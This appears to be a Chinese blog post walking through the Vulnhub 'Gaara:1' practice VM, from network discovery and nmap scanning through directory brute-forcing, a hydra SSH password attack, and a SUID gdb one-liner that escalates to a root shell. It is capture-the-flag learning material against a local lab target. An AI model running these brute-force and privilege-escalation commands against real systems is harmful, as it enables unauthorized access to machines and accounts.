带你玩转渗透测试靶场Vulnhub——Gaara:1

已于 2024-04-22 15:16:37 修改
阅读量590 收藏 8
点赞数 1
分类专栏: Vulnhub靶场 文章标签: web安全 网络安全
于 2023-10-22 17:42:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74025111/article/details/133974548
版权

1.靶场获取及环境搭建

靶场地址:因本人的百度网盘内存满了,无法上传靶场,如需靶场的可以在文章末尾添加我的v来获取

环境搭建步骤如下:

1.将下载好的Gaara:1导入VirtualBox

2.将网卡设置成和kali攻击机同一网段即可

攻击机kali:192.168.0.7

靶场ip:192.168.0.3

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)

2.靶场发现和端口扫描

netdiscover -i eth0 -r 192.168.0.1/24

进行端口扫描

nmap -A -sV -p- 192.168.0.3

扫出来是,一共是开放了两个端口的

nmap -A -sV -p- 192.168.0.3          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 16:31 CST
Nmap scan report for 192.168.0.3
Host is up (0.014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:E7:81:C5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   13.89 ms 192.168.0.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds

 先访问下80端口叭,只有这串没啥用的单词

80端口没啥可利用的了,去跑一下目录

gobuster dir -e -u http://192.168.0.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

跑出了这个Cryoserver,老规矩访问一下喽,页面访问打开的瞬间是空白,后来琢磨了一下,发现页面是可以滑动的,直接滑到最下面是有三个后缀名的,直接联想到有可以访问了哈哈哈,一个一个的去访问,访问发现第一个和第二个后缀访问出来的是一堆英文翻译过来也是一些没啥有用的信息

第三个后缀访问出来的英文看了好一会之后,发现了一串加密的数据

拿去解密,一下子不知道这个是什么算法的,琢磨了会用base58位解出来了

gaara是一个用户名,我猜测后面这个应该是密码,22端口还是开放着的,拿去连接看看,很显然密码是错误的,无法登陆

知道账户名不知道密码,那就用比较血腥的手段了,密码爆破(工具:hydra)

hydra -l gaara -P rockyou.txt 192.168.0.3 ssh -t 64

这里也已经是爆破出来了,账户:gaara   密码:iloveyou2

得到密码再次使用ssh连接,成功连接进来

查看当下目录的时候,发现了第一个flag,还有一个特殊的文件,特殊文件里面还有一个base64位加密的数据

直接丢弃base64解密

根据这个解码的提示,/usr/local/games目录下是有提示的的,直接切换至其目录下查看,切换到目录下发现了一文件,打开之后发现这是一个典型的brainfuck加密,解密之后没啥信息。

提权:查看用户的suid权限

这里的用户,gdb是可以进行一个提权的作用 ,进入到/usr/bin目录里进行提权

./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

已经提权成了root权限,我们找一下第二个flag

至此靶场就完成全部的渗透啦!

老杨网络之路.
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub:GAARA:1靶机
logan_logan的博客
06-06 725
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 nmap -p- 192.168.31.144 nmap -sC -sV -p 22,80 192.168.31.144 3.目录枚举 扫描到一个Cryoserver目录,接下来在网页中打开 gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 在浏览器中打开这个目录之后,在底部存在三个提示
Bo-Blog Gaara
11-28
1. **易用性**:该系统对初学者友好,安装过程简单,只需几步即可完成。同时,后台管理界面直观,使得日常的博客维护变得轻松。 2. **SEO优化**:Bo-Blog Gaara内置了搜索引擎优化(SEO)功能,如自定义元标签、URL...
Vulnhub--Gaara
从不专注的人的博客
06-16 415
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 361
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
vulnhub靶场,gaara1
kukudeshuo的博客
11-02 632
vulnhub靶场,gaara1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 攻击机:kali(192.168.109.128) 靶机:gaara1(192.168.109.185) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arpscan确定目标靶机 确定目标靶机IP为192.168.109.128 使用nmap扫描查看目标靶机端口开放情况 浏览器
vulnhub靶机Five86-1——新手进阶1
m0_75051044的博客
01-24 1367
攻击机:kali靶机:Five86-1实验目的:获取flag。
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 1672
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
vulnhub靶场WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1889
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
Fbx转Md5动画exe程序
12-07
●该程序能将fbx动画导出md5骨骼动画,封装的exe程序(非max脚本,非插件). ●输入的fbx和输出的md...●数据算法原创作者:Gaara(讨论群:252538785) 提取修改:迷雾森林 ●最后,感谢Gaara大神,让我在3d这条不归路上越走越远!
哈尔滨理工大学软件测试技术2014期末考试题(照片版)
06-23
1. 测试流程:软件测试通常遵循计划、设计、执行和报告四个阶段。在计划阶段,确定测试策略和资源;设计阶段,制定测试用例;执行阶段,运行测试并记录结果;报告阶段,汇总测试结果,提出改进意见。 2. 测试类型:...
Gaara-Bot:一种高质量且独特的音乐机器人,可以在播放音乐时为您提供有关YouTube视频观看次数和上传日期的信息。 更多功能即将推出
02-16
加拉·波特(Gaara Bot) 高品质和独特的音乐机器人,可以在播放音乐时为您提供有关YouTube视频观看次数和上传日期的信息。 更多功能即将推出。 表中的内容 指令 m!help显示所有命令 m!invite 〜要将bot添加/邀请到...
SakuraGaaraBlog
05-25
通过分析项目的名称,我们可以推测博客的设计可能有日式樱花或Gaara(《火影忍者》中的角色)的主题元素,这在视觉呈现上可能会有独特的风格。 HTML(HyperText Markup Language)是网页制作的基础语言,用于构建...
gaara我爱罗靶机(靶机6)
2301_77132421的博客
03-28 290
使用nmap扫描确定。
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2315
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
实战打靶集锦-026-Gaara
阿尔泰野狼的博客
03-01 764
本文记录了博主的一次打靶经历,涉及到密码爆破、具有SUID的/usr/bin/gdb提权、brainfuck解码等技术
Gaara靶机实战
yuan_boss的博客
06-27 473
​ 通过这次靶机练习之后,我对耐心这两个字深有体会,通过网站扫描之后,发现了这个网站先出现wallpaper,然后一闪而过,到达一个图片的网页,然后我就想到抓包,抓包发现靶机发送了一个Get请求,从外部获取了一个图片的地址,于是我尝试去网上找个图片地址,在BP中修改为我找的地址,想试试看能不能展示我的图片,发现最后只显示了wallpaper,并没有自己找的图片,于是打消了文件上传漏洞的念头。然后去百度搜索wallpaper,发现这是个壁纸引擎,然后我通过。
靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
qq_57976347的博客
01-26 3891
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动 一、靶场环境搭建 Me-and-My-Girlfriend-1的靶机网络模式设置为NAT 接着启动该靶场虚拟机 二、在Kali上面的操作 1.用nmap命令探测靶机的IP 用 nmap -sV -n -open -p- 192.168.100.128 扫出靶机详细信息 2.登录靶机的..
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1492
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
DC-4靶机渗透测试
读书 买花 长大
04-18 760
DC-4
puppeteer 解析html生成pdf
05-11
Puppeteer 是一个由 Google Chrome 官方团队维护的 Node.js 库,它提供了一组 API 用于控制一个 headless 版本的 Chrome 进行各种操作,比如网页截图、生成 PDF 等等。利用 Puppeteer 解析 HTML 并生成 PDF 的过程大致如下: 1. 通过 Puppeteer 启动 headless Chrome 浏览器。 2. 利用 Page 对象,打开要解析的 HTML 页面。 3. 可以使用 evaluate 函数执行 JavaScript 代码来获取页面上的元素。 4. 可以使用 PDF API 将页面转换为 PDF 文件。 Puppeteer 具有丰富的功能,例如可以模拟用户交互、监测网络请求、设置浏览器参数等等,可以让你更灵活地控制 Chrome 浏览器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值